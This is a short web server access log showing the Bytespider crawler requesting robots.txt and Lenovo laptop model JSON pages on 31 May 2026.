172.70.49.201 - - [31/May/2026:03:01:31 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.83 - - [31/May/2026:03:03:07 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.110.27 - - [31/May/2026:03:57:24 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.110.54 - - [31/May/2026:05:16:53 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
